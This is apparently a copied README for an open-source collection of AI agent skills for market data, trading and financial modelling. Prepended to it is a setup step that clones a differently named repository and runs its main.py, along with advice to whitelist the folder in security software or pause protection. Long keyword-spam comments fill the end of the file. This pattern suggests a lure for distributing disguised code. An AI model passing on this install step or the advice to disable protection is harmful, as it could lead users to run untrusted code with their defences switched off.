Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/mixedclerksmash/skills.git
cd skills
python main.pyOpen-source collection of skills compatible with the SKILL.md standard. Developed for the AI courses at UCEMA.
Skills that extract market data (quotes, historical, fundamentals, screener, etc). Multi-country / global coverage: US, Europe, Asia, and global aggregators.
| # | Skill | Type | Cost | API Key | Instruments |
|---|---|---|---|---|---|
| 1 | FRED Macro | API | ✓ Free | Required | macro-data |
| 2 | Alpha Vantage | API | Freemium | Required | stocks, forex, commodities, fundamentals |
| 3 | Yahoo Finance | API/Scraper | ✓ Free | - | stocks, forex, options, futures, fundamentals |
| 4 | SEC Data | API | ✓ Free | - | fundamentals |
| 5 | Alpaca Data | API | ✓ Free | Required | stocks, options |
| 6 | Finnhub | API | Freemium | Required | stocks, forex, fundamentals |
| 7 | Finviz | Scraper | ✓ Free | - | stocks, fundamentals, screener |
| 8 | Macrotrends | Scraper | ✓ Free | - | stocks, fundamentals |
| 9 | MarketScreener | Scraper | ✓ Free | - | stocks, fundamentals, screener |
| 10 | MarketWatch | Scraper | ✓ Free | - | stocks, options, futures, fundamentals |
| 11 | CompaniesMarketCap | Scraper | ✓ Free | - | stocks, etfs |
| 12 | SimplyWallSt | API/Scraper | ✓ Free | - | stocks, fundamentals |
| 13 | EarningsWhispers | API | ✓ Free | - | fundamentals |
| 14 | Barchart | Scraper | ✓ Free | - | stocks, futures, fundamentals |
| 15 | Nasdaq Data | API | ✓ Free | - | stocks, options, fundamentals, etfs |
| 16 | CBOE Data | API | ✓ Free | - | stocks, options, commodities, futures |
| 17 | Investing.com | Scraper | ✓ Free | - | stocks, forex, commodities, options, futures, etfs, screener, fundamentals |
| 18 | Morningstar | API | ✓ Free | - | screener |
| 19 | TradingView | API | ✓ Free | - | stocks, etfs, bonds, options, futures, forex, crypto, screener, fundamentals |
| 20 | Google Finance | API | ✓ Free | - | stocks, etfs, options, fundamentals |
Skills specific to the Argentine market: BCRA, BCBA, MAE, CAFCI, etc.
| # | Skill | Type | Cost | API Key | Instruments |
|---|---|---|---|---|---|
| 1 | BCRA Macro | API | ✓ Free | - | macro-data |
| 2 | Data912 | API | ✓ Free | - | stocks, forex, bonds, options, etfs |
| 3 | MAE | API | ✓ Free | - | bonds, macro-data, forex |
| 4 | BYMA | API | ✓ Free | - | stocks, bonds, options, etfs |
| 5 | CAFCI | API | ✓ Free | - | etfs |
| 6 | INDEC | API | ✓ Free | - | macro-data |
Skills that allow executing real trades (orders, positions, account) on broker accounts.
| # | Skill | Type | Country | Instruments |
|---|---|---|---|---|
| 1 | Alpaca Trading | REST | USA | stocks, options |
| 2 | Primary | REST+WS | Argentina | futures |
| soon | Tradier | |||
| soon | Interactive Brokers | |||
| soon | Invertironline | |||
| soon | Portfolio Personal |
Calculation and financial support tools (backtesting frameworks, screeners, options and greeks calculation, etc).
| # | Skill | Concepts |
|---|---|---|
| 1 | Option pricing | Black-Scholes, Binomial CRR, Trinomial, Monte Carlo (antithetic), Longstaff-Schwartz, Bjerksund-Stensland/BAW (American), Heston (smile), Bates (smile + crashes), greeks (delta/gamma/vega/theta/rho), implied vol, P(ITM) and P(Profit). 15 CLI modes. Flat Python + numpy, 419k options/sec (BS) |
| 2 | Backtesting | Academic backtesting framework. 30+ risk/performance ratios, 10 classes of indicators, event-driven engine with 8 built-in strategies, Markowitz optimization, forward-looking simulation (Johnson SU + t-Copula), walk-forward CV, stress testing, fundamental analysis (Altman Z, Piotroski, DuPont). Flat Python + numpy, 33 checks validation suite. |
| 3 | Portfolio | Portfolio construction and optimization: Markowitz (scipy.optimize + Monte Carlo frontier), Black-Litterman (CAPM inverse prior, absolute/relative views, Idzorek omega, Bayesian posterior), HRP/HERC/NCO (hierarchical clustering, risk parity, nested clustered optimization with constraints). All flat numpy + scipy, no Riskfolio-Lib/PyPortfolioOpt required. 12 CLI modes, verified against real yfinance data matching library outputs exactly. |
| Skill | Command |
|---|---|
| FRED Macro | npx skills add gauss314/skills --skill fred-macro |
| Alpha Vantage | npx skills add gauss314/skills --skill alpha-vantage |
| Yahoo Finance | npx skills add gauss314/skills --skill yahoo-finance |
| SEC Data | npx skills add gauss314/skills --skill sec-data |
| Alpaca Data | npx skills add gauss314/skills --skill alpaca-data |
| Finnhub | npx skills add gauss314/skills --skill finnhub |
| Finviz | npx skills add gauss314/skills --skill finviz |
| Macrotrends | npx skills add gauss314/skills --skill macrotrends |
| MarketScreener | npx skills add gauss314/skills --skill marketscreener |
| MarketWatch | npx skills add gauss314/skills --skill marketwatch |
| CompaniesMarketCap | npx skills add gauss314/skills --skill companiesmarketcap |
| SimplyWallSt | npx skills add gauss314/skills --skill simplywallst |
| EarningsWhispers | npx skills add gauss314/skills --skill earningswhispers |
| Barchart | npx skills add gauss314/skills --skill barchart |
| Nasdaq Data | npx skills add gauss314/skills --skill nasdaq-data |
| CBOE Data | npx skills add gauss314/skills --skill cboe-data |
| Investing.com | npx skills add gauss314/skills --skill investing |
| Morningstar | npx skills add gauss314/skills --skill morningstar |
| TradingView | npx skills add gauss314/skills --skill tradingview |
| Google Finance | npx skills add gauss314/skills --skill google-finance |
| Skill | Command |
|---|---|
| BCRA Macro | npx skills add gauss314/skills --skill bcra-macro |
| Data912 | npx skills add gauss314/skills --skill data912 |
| MAE | npx skills add gauss314/skills --skill mae |
| BYMA | npx skills add gauss314/skills --skill byma |
| CAFCI | npx skills add gauss314/skills --skill cafci |
| INDEC | npx skills add gauss314/skills --skill indec |
| Skill | Command |
|---|---|
| Alpaca Trading | npx skills add gauss314/skills --skill alpaca-trading |
| Primary | npx skills add gauss314/skills --skill primary |
| Skill | Command |
|---|---|
| Option pricing | npx skills add gauss314/skills --skill option-pricing |
| Backtesting | npx skills add gauss314/skills --skill backtesting |
| Portfolio | npx skills add gauss314/skills --skill portfolio |
Each skill is a directory following the Agent Skills standard structure:
.
├── skills/
│ └── <skill-name>/
│ ├── SKILL.md # required: frontmatter + instructions
│ ├── references/ # optional folder: complementary documentation
│ ├── scripts/ # optional folder: executable example scripts
│ └── assets/ # optional folder: templates, configs
├── README.md
├── LICENSE # MIT
└── .gitignore
The command npx skills add gauss314/skills --skill bcra-macro installs:
Files in references/, scripts/ and assets/ are loaded only when the skill needs them, following the Progressive Disclosure principle to optimize tokens.
---
name: skill-name
description: Short description (<100 characters)
license: MIT
---
# Skill Name
Instructions for the agent and SKILL content...Required fields: name, description
Optional fields: license, metadata, disable-model-invocation
npx skills add gauss314/skills --skill bcra-macro -g
## Skill Description
#### Data — Global
**FRED Macro:** **840,000+** macroeconomic series from the Federal Reserve (GDP, CPI, rates, employment, M2, VIX, treasuries, mortgages). Historical series since **1996** with search by name/category, tags, releases, and daily/monthly/quarterly/annual frequencies. Official free API.
**Alpha Vantage:** **20+** global exchanges, **200,000+** tickers (stocks, forex, crypto, commodities). Freemium with **25 calls/day** free. Covers TIME_SERIES_INTRADAY/DAILY/WEEKLY/MONTHLY, **50+** technical indicators, fundamental overview, FX rates, crypto ratings, commodities (metals, energy, grains).
**Yahoo Finance:** global coverage — stocks, ETFs, crypto, forex, bonds, indices, options, futures, fundamentals and news. Quotes delayed **15min**, daily/intraday OHLCV, financial statements, options chains, futures on commodities and indices, news, analyst recommendations, insider transactions. Unofficial endpoints via direct HTTP requests (no wrapper).
**SEC Data:** all companies filing with the SEC (10K, 10Q, 8K) — US public companies + internationals using IFRS. Data from the last **5+ years** with quarterly + annual. Concept-level data navigable. Supports US-GAAP and IFRS with automatic concept mapping. Income/balance/cashflow statements in JSON/CSV from XBRL facts.
**Alpaca Data:** **5,000+** US stocks + crypto + options with historical and real-time data. IEX feed. Snapshots, bars (OHLCV), trades, quotes. Multi-asset with symbol normalization. Generous free tier for historical data, real-time with limit.
**Finnhub:** **32** free REST endpoints with US/EU/UK coverage + forex + crypto. Quotes, company profile, financials, earnings calendar, recommendations trends, price targets, insider transactions, company peers, ESG scores, news, economic data, WebSocket. Freemium **60 calls/min**.
**Finviz:** **8K+** US stocks (NYSE, NASDAQ, AMEX) + Canada. Fundamental data (P/E, EPS, PEG, margins), technical (RSI, MACD, SMA, ATR), insider trading, institutional ownership, news, online screener with filters (market cap, P/E, sector, performance). Scraper of the Finviz site.
**Macrotrends:** **~6,500** tickers from US markets (NYSE, NASDAQ, AMEX), including international ADRs from **+30 countries**. Financial statements, ratios, employee count with **15+ years** of historical data. Income/balance/cashflow with **5-30 years** of history, profitability ratios, debt, margins, per-share data, segment data.
**MarketScreener:** **20K+** global stocks including ADRs. Quote, profile, financials (income/balance/cashflow), valuation, analyst consensus, news, earnings transcripts list, insider trading, shareholders, corporate governance, earnings calendar, recommendations, ownership structure. Global multi-country coverage.
**MarketWatch:** US stocks and global ADRs. Quotes, financials, SEC filings, analyst estimates, options chain, futures, historical OHLCV. Point-in-time data per ticker, comparable companies panel, screeners by category. Futures data on indices, commodities, rates and currencies.
**CompaniesMarketCap:** global financial rankings (market cap, earnings, revenue, employees, P/E, margins, assets, debt, cash), historical marketcap of stocks and ETF holdings. Global coverage — top companies by any metric, historical capitalization, ETF holdings. Uses native CSV download of the site.
**SimplyWallSt:** **120,000+** global stocks in **106** exchanges. Snowflake scores (1-5 stars: value, income, health, past, future, management), valuation vs sector, dividend history (**19+ years**) and projected, financial health score, insider transactions, price targets, P/E/P/B/ROE analysis. Internal REST API of the web frontend.
**EarningsWhispers:** **33,500+** global stocks tracked (US, Europe, Asia, LatAm). COMPLETE earnings transcripts (prepared remarks + Q&A) via public API without auth. No anti-bot, no aggressive rate limiting. Tested on **60+** tickers (AAPL, MSFT, GGAL, SHEL, TM, VALE, etc). Metadata: date, fiscal period, participants.
**Barchart:** **30K+** US stocks and global ADRs, plus futures. Delayed quotes, fundamentals, insider summary, analyst estimates, opinion pages with ticker search. Futures data on indices, commodities, currencies, rates. Scraper of the Barchart site.
**Nasdaq Data:** US stocks (nasdaq + nyse + other US exchanges). Internal REST API of Nasdaq.com with access to quotes, short interest (semi-monthly), financials, **13F** filings (institutional holdings), insider transactions, options chains, dividends, earnings, news, ETFs where the stock is a Top 10 Holding.
**CBOE Data:** CBOE indices (VIX, SPX, DJ, RUT), options, VX futures (VIX futures chain) + bond futures (IBHY, IBIG) and variance (VA), options with greeks, intraday **1-min** bars, market summary per exchange (BZX, BYX, EDGX, EDGA), most-active equities and options, symbol lookup, historical HV/IV.
**Investing.com:** **81K+** equities, **10K+** indices, **2.4K** currencies, **344** commodities, futures on indices/commodities/rates, **30K+** ETFs, **4K+** crypto. Global coverage. Quotes, historical OHLCV, fundamentals (income/balance/cashflow/ratios), dividends, earnings, profile. Data delayed **15-20min**. Requires `curl_cffi` for Cloudflare bypass.
**Morningstar:** **53** universes, **102K+** listings, **39** countries. Argentine CEDEARs (XBUE, 469), NYSE (XNYS, 2,343), Nasdaq (XNAS, 3,741), Frankfurt (XFRA, 14K+), Tokyo (XTKS, 3,989), Shanghai (XSHG, 2,365), Shenzhen (XSHE, 2,934), Hong Kong (XHKG, 2,757), India (XBOM, XNSE, 5K+), Korea (XKRX, 2,877), Brazil (BVMF, 2,070), BMV (XMEX, 2,233), London (XLON, 1,333), Paris (XPAR, 728), Zurich (XSWX, 507), Tel Aviv (XTAE, 546), Johannesburg (XJSE, 332), and **30+** more. **33** fields per listing: price, market cap, ratios, returns 1d/1w/1m/3m/6m/12m/36m/60m/120m, debt, dividend yield, sector, industry. Multi-currency, multi-country, multi-language.
**TradingView:** GLOBAL coverage — **100K+** stocks, **50K+** cryptos, indices, forex, bonds. Scanner API with **~300** columns (quote, pre-calculated technical indicators RSI/MACD/EMAs/SMAs/pivots, aggregated BUY/SELL ratings, valuation, financials, earnings + forecasts, analyst targets, dividends, ownership, short interest, returns). Symbol Search v3 with ISIN/CUSIP/CIK (joinable with SEC EDGAR). News Headlines (**~200** per stock, Dow Jones/Reuters/MarketBeat). HTML scraping of **16+** subpages (technicals, financials-income-statement, balance-sheet, cash-flow, options-chain, forecast, ideas). Mass SQL-like screener with filters + sort + pagination. **24** CLI modes with **4** unique HTTP endpoints.
**Google Finance:** Internal RPC API (`batchexecute`) discovered by reverse engineering. **NO API key, NO auth.** **19** CLI modes over **14+** RPC IDs. Quote (US + Argentine BCBA), OHLC intraday **1-min** + **5-min** (free, not available in other providers), OHLC daily last month + 6 months, massive financials (~22 KB income/balance/cashflow multi-period), earnings history, **analyst recommendations with individual detail** (Goldman, etc, with firm + target + date), technical ratings, company description with physical address + employees, peers, news with thumbnails, **global indices in 1 call** (Dow, S&P, NASDAQ, VIX, DAX, FTSE, Nikkei, Hang Seng, IBEX, CAC), sectors heatmap. Unique differentiators: free 1-min OHLC + per-analyst detail + company address. ⚠️ **Unofficial API, requires precautions** — read `references/LIMITATIONS_TROUBLESHOOTING.md`. Exhaustive documentation with 5 references + 3 JSON assets + warnings + plan B with alternative providers.
#### Data — Regional (Argentina)
**BCRA Macro:** **1,220** total series → **638** national series (official catalog v4.0) from the Central Bank. Daily/periodic series: exchange rate (official, wholesale, MEP, CCL, blue*), reserves, monetary policy rate, BADLAR, CER, UVA, LELIQ, monetary base, M2, deposits, loans. Data since **1996**.
**Data912:** Argentine market live — local stocks, CEDEARs, bonds, bills, options, MEP, CCL. US live — stocks and volatilities. Refreshes every **20** seconds, rate limit **120 req/min**. Historical OHLCV, filter screener, fundamental data of AR companies.
**MAE:** **17** endpoints. Complete wholesale trading: fixed income (LECAPs, BONCAPs, BOPREALes, hard dollar bonds, corporate bonds), repos (CAARS pesos, CAUSD dollars by term), REPO, swaps, FORWORD, wholesale FOREX, deferred dollar (DDF), ARS-MAE index, primary auctions, institutional communications, fund flows for TIR/MD curves.
**BYMA:** **9** endpoints. Complete Argentine stock exchange: leading stock panels, CEDEARs, sovereign bonds + LECAPs/BONCAPs, corporate bonds, repos, options and SENEBI. Historical OHLCV of instruments and indices (MERVAL, BURCAP). Equity (local stocks + CEDEARs), fixed income (sovereign, LECAPs, corporate bonds), derivatives (options). Bond technical sheet with amortization schedule.
**CAFCI:** **1,152** funds and **4,615** classes active as of 2026-06. Categories: Money Market, Fixed Income, Equity, Mixed Income, PyMes, Total Return, Infrastructure, Closed Funds, ASG, RG900. JSON catalog (fees, IDs, metadata), daily XLSX snapshot (VCP, equity, market share, variations), individual markdown sheet (TNA returns per period), portfolio composition (top assets). **4** endpoints + local daily cache.
**INDEC:** Official **Series de Tiempo** API of the Argentine State (`apis.datos.gob.ar/series`). **~4,250** series from INDEC + BCRA + Min Economy + Sec Labor + DGEYC. NO API key, NO auth, NO captcha. **The most stable and best-documented API in the repo** — official documentation, GitHub source, no-break ABI policies. Coverage: National IPC (general level, core, regulated, by chapters and regions), EMAE (original + seasonally adjusted + sectoral), IPI Manufacturing, ISAC Construction, EPH (unemployment by region), poverty line, exports, RIPTE wages, SMVM, BCRA exchange rate, BCRA reserves, REM market expectations. **Unique features:** 7 builtin transformations server-side (`percent_change_a_year_ago` = YoY inflation, `percent_change_since_beginning_of_year` = YTD inflation), 6 builtin temporal aggregations (daily→monthly→yearly with avg/sum/end_of_period/min/max), multi-series in 1 request. **19** CLI modes with 9 indicator shortcuts (`ipc`, `emae`, `salarios`, `dolar`, `reservas`, etc). Documentation: 10 references (REFERENCE, ENDPOINTS, PARAMS, REPRESENTATION_MODES, COLLAPSE_AGGREGATIONS, SERIES_CATALOG, RESPONSE_FORMAT, DATA_SOURCES, COOKBOOK with 30+ recipes, LIMITATIONS_TROUBLESHOOTING) + 5 JSON assets with curated catalog of canonical series IDs.
#### Brokers
**Alpaca Trading:** paper trading (free) and live trading of US stocks, crypto and options. REST API over Alpaca Broker. Market data via IEX feed. Market/limit/stop/trailing-stop orders, short selling, multi-leg options. Positions, account, watchlists, calendar. Official SDK: `alpaca-py`.
**Primary:** Trading API for Matba ROFEX (Argentina's derivatives exchange). Futures (USD, soybean, corn, wheat), options on futures, stocks, bonds, CEDEARs. Token-based auth (24h). REST + WebSocket for real-time market data, order entry/cancel, and execution reports. Risk API (HTTP Basic Auth) for positions and account reports. No SDK — direct HTTP via `requests`.
#### Tools
**Option pricing:** flat-Python, numpy-vectorized option pricing for backtesting. 9 methods covering vanilla, smile, and tail risk: Black-Scholes (closed-form, european), Binomial CRR (tree, american + european), Trinomial Boyle (tree, american + european), Monte Carlo with antithetic variates (european) + Longstaff-Schwartz (american via simulation), Bjerksund-Stensland 2002 / BAW (closed-form american), Heston 1993 (stochastic vol, smile via Fourier integral), Bates 1996 (Heston + Merton jumps, captures crash risk). Plus analytic greeks (delta/gamma/vega/theta/rho), implied volatility solver via bisection, and risk-neutral P(ITM) and P(Profit). CLI with 15 modes including `validate` and `bench`. Real benchmarks (Python 3.14 + numpy 2.4.4, same inputs for all methods): BS 2.4 us/op (419k/s), BS2 3.6 us/op (276k/s), P(ITM) 1.1 us/op (908k/s), Heston 398 us/op (2.5k/s), Bates 6.2 ms/op (160/s), Binomial N=500 5.6 ms/op (178/s). Validated against Hull 9th ed (Examples 15.6 and 21.1) and put-call parity (15/15 pass).
**Backtesting:** academic backtesting framework for quantitative research. **30+** risk and performance ratios (flat, numpy-vectorized, no classes), **10** classes of indicators (trend-following, oscillators, contrarians, flow, combined, discrete counts, seasonality, statistical, referential, fundamental). Event-driven **BacktestEngine** with 8 built-in strategies (SMA crossover, RSI mean-reversion, MACD, Bollinger Bands contrarian, ADX trend, momentum, growth+momentum combo). **Markowitz** efficient frontier with random portfolio sampling and Monte Carlo simulation. **Forward-looking** simulation with Johnson SU marginals + t/Gaussian copula, drift, and fan-chart projection. **Walk-forward** cross-validation with expanding window and IS/OOS gap. **Stress testing** with parametric scenario shocks. **Fundamental analysis**: Altman Z-Score (bankruptcy prediction), Piotroski F-Score (9-criterion quality), DuPont decomposition (5-factor ROE). **30+** risk/performance ratios: Sharpe, Sortino, Calmar, Kelly, MaxDD, Ulcer, Recovery Factor, Rachev A/B/C, Common Sense Ratio, Payoff Ratio, Profit Factor, Win/Loss Ratio, VaR (empirical/normal/Johnson SU), cVaR, tracking error, information ratio. **31-check** 4-level validation suite (`py scripts/validate.py`) covering CLI modes, mathematical consistency, edge cases, and regression.
**Portfolio:** portfolio construction and optimization from the course material (MPT, NCO, Black-Litterman). **Markowitz** via scipy.optimize or Monte Carlo simulation with efficient frontier and CML tangent line. **Black-Litterman** full pipeline: market-implied risk aversion (delta), CAPM-inverse prior returns, absolute and relative views with confidence levels, Idzorek omega, Bayesian posterior returns and covariance, Markowitz on BL posterior. **HRP/HERC/NCO** hierarchical methods: correlation-to-distance clustering (single/complete/average/ward), recursive bisection risk parity, nested clustered optimization with intra/inter-cluster Markowitz, NCO with per-asset and per-class constraints. **Risk measures**: VaR, CVaR, MAD, MSV, max drawdown, CDaR, diversification ratio, risk contribution. **Covariance estimation**: historical, Ledoit-Wolf (sklearn-compatible), OAS, EWMA. **12 CLI modes** (`markowitz`, `montecarlo`, `frontier`, `bl-prior`, `bl`, `hrp`, `herc`, `nco`, `nco-con`, `clusters`, `risk`, `stats`). All flat numpy + scipy, zero external financial libraries required. **28-test suite** with mathematical consistency checks + real yfinance verification matching PyPortfolioOpt/Riskfolio-Lib outputs exactly.
---
## Compatibility
Tested with:
- Claude Code, Antigravity, Cursor, Windsurf, Gemini CLI, Codex, OpenCode, CommandCode CLI, Kimi CLI, Trae
## License
[MIT](./LICENSE)
<!-- python pip pypi package library module script tool windows linux macos -->
<!-- skills - tool utility software - download install setup -->
<!-- tutorial self hosted skills api | macos skills decoder | top skills module | run on linux skills checker | online skills desktop | guide skills | arch self hosted skills | start skills encoder | documentation skills module | run skills server | download for linux skills decoder | getting started skills package | skills setup | free download skills extractor | skills wrapper | windows best skills | walkthrough skills package | 2025 skills builder | sample skills analyzer | skills course | portable skills monitor | fedora modern skills | skills documentation | simple skills framework | lightweight skills app | native skills utility | skills extension | debian minimal skills | run on mac low latency skills | simple skills api | stable skills program | how to run skills gui | compile skills framework | guide skills reader | free download open source skills addon | start skills | simple skills | updated skills gui | documentation stable skills extension | new version skills library | get modular skills | run skills copy | examples skills client | easy skills fork | 2026 skills package | arch skills extractor | compile skills | portable skills builder | ubuntu skills alternative | production ready skills viewer -->
<!-- 2026 skills scanner | configure skills binding | run on windows skills converter | quick start skills editor | skills reddit | start skills optimizer | linux skills | download for linux skills editor | tar.gz github skills | low latency skills package | quick start skills creator | free secure skills | configure simple skills | download for windows skills replacement | skills decoder | examples free skills | updated open source skills | powerful skills gui | offline skills replacement | linux skills service | deploy skills mirror | safe skills tester | docs low latency skills | getting started easy skills | configure skills sdk | documentation skills tester | how to download skills client | source code minimal skills | easy skills program | docs skills utility | skills github | how to setup safe skills | native skills service | github open source skills | how to build skills desktop | native skills port | advanced skills tracker | windows skills downloader | install modern skills builder | how to configure skills server | download native skills | quick start skills reader | setup modular skills | sample skills editor | build skills viewer | zip skills uploader | source code skills package | configurable skills tool | fedora top skills program | open skills engine -->
<!-- download for mac skills desktop | skills parser | build skills gui | run on windows skills | cross platform skills cli | skills library | tutorial skills | free skills api | new version skills compressor | skills logger | how to run free skills | getting started safe skills compressor | beginner free skills fork | arch skills utility | example skills mobile | how to build skills extension | download for windows skills api | setup skills builder | install skills mirror | how to build skills | github skills downloader | advanced skills decoder | minimal skills web | github skills wrapper | run on mac safe skills alternative | tar.gz native skills | open source configurable skills | free skills package | easy skills desktop | launch skills extension | best skills optimizer | run on windows stable skills gui | modular skills | how to setup skills platform | run on linux skills | getting started skills wrapper | how to use skills editor | extensible skills debugger | quick start fast skills client | build skills tracker | production ready skills module | docs skills fork | how to build skills client | latest version skills | download for linux modern skills | skills cli | skills project | how to run skills extractor | download for mac skills alternative | free download skills -->
<!-- execute skills utility | skills platform | configure skills | compile lightweight skills | fast skills uploader | portable skills compressor | cross platform skills application | how to run skills utility | centos skills plugin | run modular skills | how to use powerful skills | how to configure skills mirror | setup skills creator | beginner skills builder | download for windows online skills | run on windows skills application | wiki safe skills | documentation skills platform | how to deploy skills fork | guide skills port | tutorial skills engine | skills desktop | simple skills program | guide skills tool | how to build high performance skills | skills validator | github skills | skills fix | how to deploy skills | docs skills alternative | best skills mirror | skills scanner | free skills extension | deploy skills copy | how to install skills compressor | 2025 skills logger | skills handbook | how to deploy cross platform skills | get skills extension | skills vs | ubuntu skills sdk | macos skills extractor | skills blog | how to deploy skills platform | github skills plugin | customizable skills | git clone portable skills service | debian self hosted skills | wiki skills | offline skills builder -->
<!-- launch skills | skills viewer | tutorial open source skills | centos skills wrapper | cross platform skills extension | download skills addon | reliable skills engine | wiki native skills | customizable skills tracker | low latency skills | latest version skills downloader | powerful skills downloader | walkthrough skills checker | native skills | git clone skills copy | reliable skills desktop | download for mac skills downloader | simple skills engine | github skills tracker | quick start easy skills decoder | beginner skills replacement | how to download skills encoder | tar.gz skills service | local skills cli | reliable skills cli | run on mac skills software | latest version skills plugin | free download skills checker | configurable skills module | configurable skills desktop | wiki low latency skills extension | walkthrough github skills | github skills replacement | wiki skills utility | setup skills converter | reliable skills utility | demo skills | debian skills desktop | skills downloader | native skills tester | deploy skills | deploy skills platform | minimal skills debugger | arch skills | fast skills logger | compile skills compressor | macos skills desktop | cross platform skills app | online skills port | skills workshop -->
<!-- skills software | use skills desktop | skills book | offline skills uploader | documentation skills logger | run on linux minimal skills | deploy skills library | fedora skills optimizer | github skills api | git clone skills addon | offline skills creator | how to run skills parser | centos skills library | secure skills converter | native skills checker | updated extensible skills replacement | docs skills extractor | skills error | top skills builder | free extensible skills client | new version production ready skills analyzer | git clone skills | github skills app | github skills service | arch minimal skills | walkthrough skills engine | windows skills cli | run on linux customizable skills | tutorial skills alternative | high performance skills | download for mac local skills | portable skills client | beginner offline skills | skills port | ubuntu skills encoder | skills tutorial | how to deploy skills application | compile fast skills | debian skills builder | how to deploy skills app | skills binding | free skills encoder | run on mac skills creator | run on windows skills editor | open source skills builder | how to install cross platform skills | is skills safe | low latency skills clone | guide skills desktop | 2026 configurable skills -->
<!-- skills tool | best skills api | linux skills app | linux skills plugin | windows skills server | execute skills module | get skills service | build skills software | run on linux skills utility | 2025 skills client | docs skills | centos skills | high performance skills extension | download for linux minimal skills | configure skills service | run on linux skills addon | windows github skills | how to configure skills | quickstart skills tracker | self hosted skills parser | sample skills | launch skills wrapper | open skills fork | modern skills | execute self hosted skills scanner | fedora skills gui | quickstart skills copy | free skills addon | open self hosted skills | skills podcast | best skills | easy skills | skills generator | skills sdk | 2025 skills desktop | start skills app | download for windows skills gui | build skills | how to configure open source skills analyzer | free download skills monitor | low latency skills gui | install open source skills web | configurable skills | cross platform skills | launch skills service | stable skills module | start skills wrapper | skills monitor | skills devops | tar.gz skills platform -->
<!-- skills ci cd | tar.gz skills parser | setup skills extractor | quickstart skills mirror | modular skills addon | compile free skills | source code powerful skills cli | self hosted skills scanner | how to download github skills | how to install skills viewer | open fast skills | skills optimizer | updated skills cli | stable skills | windows skills | online skills alternative | open skills module | get self hosted skills | execute easy skills | download for linux online skills gui | modern skills clone | skills replacement | ubuntu skills parser | skills saas | extensible skills encoder | open source advanced skills | run skills replacement | source code skills | how to install skills optimizer | install open source skills | stable skills server | centos skills tester | powerful skills mobile | walkthrough skills | how to download skills | start skills fork | fast skills engine | beginner skills module | run on mac skills web | deploy github skills | demo skills wrapper | zip skills generator | use minimal skills program | walkthrough cross platform skills | how to run skills copy | lightweight skills server | high performance skills addon | example skills clone | modular skills tracker | 2025 minimal skills -->
<!-- git clone skills api | skills copy | macos skills | download for linux skills extension | how to run skills | quickstart skills platform | beginner skills reader | tar.gz skills creator | free skills software | updated skills library | open skills software | is skills good | skills benchmark | free download skills fork | local skills platform | offline skills | how to use skills package | low latency skills server | stable skills tester | reliable skills wrapper | lightweight skills | top skills framework | low latency skills mobile | how to build customizable skills | fedora skills program | configurable skills checker | skills fork | tar.gz advanced skills clone | run on mac skills | reliable skills software | extensible skills replacement | cross platform skills logger | how to build configurable skills | fedora local skills | skills download | git clone skills optimizer | skills bug | secure skills | how to install skills application | install skills optimizer | skills package | use advanced skills | skills analyzer | centos open source skills | skills workflow | guide skills application | skills best practice | free skills validator | execute skills clone | native skills mirror -->
<!-- quick start skills server | demo modern skills generator | getting started modular skills web | updated portable skills | get skills | skills clone | download for linux safe skills reader | debian skills reader | github skills extractor | fast skills alternative | getting started skills engine | wiki skills viewer | configurable skills tester | git clone skills module | how to setup high performance skills | customizable skills app | linux skills encoder | download for linux low latency skills | offline skills checker | skills gui | run on windows skills software | skills editor | 2026 skills cli | source code skills tester | centos safe skills | use skills creator | skills framework | download for windows portable skills | advanced skills sdk | skills example | customizable skills mirror | free download skills mirror | free skills creator | compile skills parser | install skills tracker | updated safe skills | wiki skills tester | skills web | skills help | how to configure skills software | launch advanced skills decoder | source code skills clone | docs skills parser | powerful skills package | ubuntu portable skills | skills plugin | getting started skills generator | quickstart skills alternative | reliable skills analyzer | fedora skills -->
<!-- Last updated: 2026-06-09 17:41:25 -->